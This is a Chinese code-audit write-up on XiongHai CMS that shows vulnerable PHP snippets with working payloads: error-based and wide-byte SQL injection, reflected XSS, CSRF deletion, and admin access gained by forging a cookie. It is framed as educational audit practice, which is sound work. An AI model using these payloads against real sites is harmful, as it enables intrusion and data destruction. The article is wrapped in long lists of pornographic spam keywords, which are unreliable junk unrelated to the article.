日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区

您的位置:首頁技術文章
文章詳情頁

熊海CMS代碼審計漏洞分析

瀏覽:374日期:2022-06-06 15:09:10
目錄
  • 前言
  • 基本結構
  • SQL注入漏洞
    • 第一處
    • 第二處
    • 第三處
  • XSS漏洞
    • 第一處
    • 第二處
  • CSRF漏洞
    • 第一處
  • 垂直越權
    • 第一處
  • 結語

    前言

    熊海CMS是由熊海開發(fā)的一款可廣泛應用于個人博客,個人網(wǎng)站,企業(yè)網(wǎng)站的一套網(wǎng)站綜合管理系統(tǒng)。作為一個早期的系統(tǒng),里面代碼存在許多漏洞利用點,且代碼量低適合作為代碼審計的入門挑戰(zhàn),本文就帶領大家對該系統(tǒng)存在的漏洞進行分析。

    基本結構

    這里我選擇使用小皮面板搭建在了本地,以便于調試錯誤,首先我們看看系統(tǒng)的結構:

    ——admin     //后臺?件——css       //css?件——files    //功能函數(shù)?件——images   //圖?——index.php //主?錄?件——install   //安裝?件——seacmseditor  //編輯器——template      //模板?件——upload    //?件上傳?錄

    SQL注入漏洞

    第一處

    我們跳轉到admin/files/editlink.php,分析里面的一段代碼:

    $id=$_GET["id"];$type=$_GET["type"];if ($type==1){$query = "SELECT * FROM nav WHERE id="$id"";$resul = mysql_query($query) or die("SQL語句有誤:".mysql_error());$nav = mysql_fetch_array($resul);}

    簡單分析一下,我們通過GET輸入id和type,之后type與1進行對比,匹配后會執(zhí)行SQL語句,了解SQL注入漏洞的朋友可能會看出這里有一個單引號閉合漏洞,我們只需在參數(shù)前進行構造閉合單引號,之后便可以成功執(zhí)行自定義的SQL語句:

    r=editcolumn&type=1&id=1"%20or%20updatexml(1,concat(0x7e,database()),1)%23

    需要注意的是作為結果只返回給我們SQL語句正確與否,所以這里考慮使用錯報注入。

    第二處

    admin/files/editlink.php這個路徑下有一段代碼:

    $id=$_GET["id"];$query = "SELECT * FROM link WHERE id="$id"";$resul = mysql_query($query) or die("SQL語句有誤:".mysql_error());$link = mysql_fetch_array($resul);

    這里同樣存在一個GET傳參點,我們可以傳入變量名為id的值,之后會執(zhí)行SQL語句查詢ID,若SQL語句有誤,進行錯報,因為是單引號閉合這里可以和第一處一樣使用錯報注入。

    id=1"%20or%20updatexml(1,concat(0x7e,database()),1)%23

    第三處

    /file/download.php這個路徑下的代碼:

    $llink=addslashes($_GET["r"]);$query = "SELECT * FROM nav WHERE link="$llink"";

    可以看到里面有addslashes函數(shù):

    這個函數(shù)會將預定義字符轉換加上反斜杠,所以我們無法進行正常的單引號閉合,需要想辦法繞過,方法也很多,這里就簡單用寬字節(jié)注入繞過,具體使用方法可以參考我之前的文章:

    參考大佬的payload:

    r=%df%27or%20if(1,sleep(3),1)%20%23

    XSS漏洞

    第一處

    在/file/contact.php出存在漏洞代碼:

    $page=addslashes($_GET["page"]); <?php echo $page?> 

    可以看到直接echo出了page變量,而該變量是我們直接可以GET傳入的,這里我們直接使用彈窗payload:

    <img src=1 onerror=alert(/xss/)>

    第二處

    在/files/content.php出,存在與第一處差不多的代碼:

    $page=addslashes($_GET["page"]);if ($page<>""){if ($page<>1){$pages="第".$page."頁 - ";}

    我們也可以向上面一樣將語句傳進變量里去。

    CSRF漏洞

    第一處

    這里以/admin/files/wzlist.php為例:

    $delete=$_GET["delete"];if ($delete<>""){$query = "DELETE FROM content WHERE id="$delete"";$result = mysql_query($query) or die("SQL語句有誤:".mysql_error());echo "<script>alert("親,ID為".$delete."的內容已經(jīng)成功刪除!");location.href="?r=wzlist"</script>";exit;

    可以看到代碼執(zhí)行刪除SQL語句時并沒有對代碼進行檢測,刪除操作對應下面的界面:

    我們先嘗試刪除然后進行抓包,抓到了刪除時GET進行的傳參:

    ?r=wzlist&delete=18

    之后換另一個瀏覽器訪問整個payload,結合該系統(tǒng)中的一個越權操作,將user改成admin,之后訪問,成功實現(xiàn)了跳過驗證進行了刪除操作。

    當然這只是其中的一個點,softlist.php也存在類似的CSRF漏洞。

    垂直越權

    第一處

    在/inc/checklogin.php中,這里只看存在漏洞的代碼:

    $user=$_COOKIE["user"];if ($user==""){header("Location: ?r=login");exit;   

    這里直接給user的cookie值設置成admin,即可跳轉管理員界面。

    結語

    今天給大家?guī)淼氖且粋€小型CMS的代碼審計,當然該系統(tǒng)的漏洞遠不止文中提到的這些,總的來說還是挺簡單的,有興趣的小伙伴可以自己下載源碼去搭建系統(tǒng)

    以上就是熊海CMS代碼審計漏洞分析的詳細內容,更多關于熊海CMS代碼審計的資料請關注其它相關文章!

    標簽: PHP
    日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区
    国产欧美久久一区二区三区| 久久国产精品色av免费看| 国产欧美一区二区色老头| 青青国产91久久久久久| 国产欧美一区二区三区精品观看| 国产精品v亚洲精品v日韩精品| 国产福利91精品一区二区| 欧美国产小视频| 亚洲手机视频| 亚洲精品九九| 你懂的国产精品永久在线| 精品国产一级| 欧美日韩国产高清电影| 日本成人一区二区| 开心激情综合| av综合电影网站| 影音国产精品| 日韩精品一区二区三区中文| 国产精品hd| 日韩精品欧美| 亚洲精品观看| 精品国产午夜肉伦伦影院| 欧美高清不卡| 日韩一区二区三区四区五区| 国产一区二区亚洲| 亚洲激情精品| 国产精品亚洲二区| 欧美日韩精品一区二区视频| 亚洲1区在线观看| 精品国产欧美日韩一区二区三区| 欧美日韩在线观看视频小说| 91免费精品国偷自产在线在线| 日韩在线视频精品| 日本综合精品一区| 丝袜美腿一区| 青草国产精品| 欧美日韩精品一本二本三本| 欧美激情三区| 香蕉久久久久久久av网站| 欧美精品91| 免费在线观看成人| 一区二区三区四区日本视频| 日本午夜精品久久久| 在线一区视频观看| 18国产精品| 欧美午夜不卡| 成人日韩av| 久久国产三级精品| 亚洲自拍另类| 久久婷婷av| 精品理论电影在线| 日本综合视频| 99热精品在线| 国产欧洲在线| 国产精品一区二区av日韩在线| 9久re热视频在线精品| 成人在线黄色| 日韩国产在线观看| 日韩中文字幕1| 欧美日韩一区二区综合 | 欧美激情三区| 亚洲综合中文| 日韩视频二区| 欧美成人a交片免费看| 国产精品手机在线播放| 中文字幕日韩高清在线| 91精品91| 日韩av免费| 国产一区二区三区成人欧美日韩在线观看| 亚洲乱码久久| 老色鬼久久亚洲一区二区| 国产综合婷婷| 九一国产精品| 久久裸体视频| 国产精品久久久久久久久久久久久久久 | 欧美日韩国产亚洲一区| 日韩av在线播放网址| 国产精品视频3p| 日韩精品成人| 亚洲精品伦理| 亚洲专区视频| 国产午夜久久| 亚洲二区三区不卡| 欧美亚洲国产激情| 久久精品一区二区不卡| 日本不良网站在线观看| 中文字幕在线官网| а√天堂8资源在线| 9999国产精品| 精品国产aⅴ| 精品亚洲精品| 国产成人免费| 日韩天堂在线| 视频一区中文| 久久亚洲精品伦理| 天堂久久一区| 91精品麻豆| 麻豆精品av| 一区二区三区四区日本视频| 欧美一区久久久| 久久久久国产一区二区| 性欧美xxxx免费岛国不卡电影| 一级欧洲+日本+国产| 日韩精品一二三区| 日韩激情网站| 精品九九久久| 精精国产xxxx视频在线野外 | 中文在线а√在线8| 国产精品久久久久av电视剧| 婷婷激情综合| 亚洲免费婷婷| 日韩 欧美一区二区三区| 国产欧美日韩在线观看视频| 久久在线91| 久久蜜桃精品| 免费日韩一区二区| 欧美日韩1区| 国产精品久久久久久久久久10秀| 99久久激情| 亚洲婷婷丁香| 欧美黑人巨大videos精品| 神马午夜久久| 免费观看在线综合| 久久免费福利| 婷婷激情图片久久| 综合色就爱涩涩涩综合婷婷| 精品亚洲精品| 中文在线不卡| 国产精品99久久免费观看| 国产精品av久久久久久麻豆网| 综合激情婷婷| 久久久久久网| 一区二区电影在线观看| 精品国产中文字幕第一页| 亚洲精品2区| 久久av综合| 亚洲综合三区| 久久久久久久久成人| 午夜在线精品偷拍| 狂野欧美性猛交xxxx| 久久久久一区| 日韩av网站在线免费观看| 精品成人免费一区二区在线播放| 亚洲精品在线二区| 91综合网人人| 午夜亚洲福利| 久久蜜桃精品| 久久99蜜桃| 中文一区一区三区免费在线观 | 欧美女激情福利| 里番精品3d一二三区| 亚洲欧美激情诱惑| 视频在线不卡免费观看| 中文字幕一区二区三区在线视频| 国产亚洲观看| 欧美va亚洲va日韩∨a综合色| 国产日产精品_国产精品毛片| 亚洲一级影院| 久久久久久一区二区| 日本欧美大码aⅴ在线播放| 国产精品7m凸凹视频分类| 国产一区二区三区探花| 69堂免费精品视频在线播放| 美女少妇全过程你懂的久久| 欧美黄页在线免费观看| 亚洲三级av| 亚洲国产不卡| 蜜臀国产一区| 麻豆中文一区二区| 免费视频最近日韩| 日韩欧美精品一区| 欧美精品第一区| 香蕉久久一区| 快she精品国产999| 国模 一区 二区 三区| 福利一区和二区| 国产精品一区二区三区av麻| 亚洲精品伊人| 日韩专区一卡二卡| 亚洲性图久久| 电影亚洲精品噜噜在线观看| 麻豆高清免费国产一区| 国产免费av国片精品草莓男男| 综合国产精品| 欧美日韩免费观看一区=区三区| 欧美国产偷国产精品三区| 欧美一区免费| 中文字幕一区二区精品区| 亚洲激情欧美| 午夜精品影院| aⅴ色国产欧美| 尤物精品在线| 欧洲毛片在线视频免费观看| 久久精品观看| 成人羞羞在线观看网站| 桃色av一区二区| 成人va天堂| 久久国产电影| 国产国产精品| 欧美成人亚洲|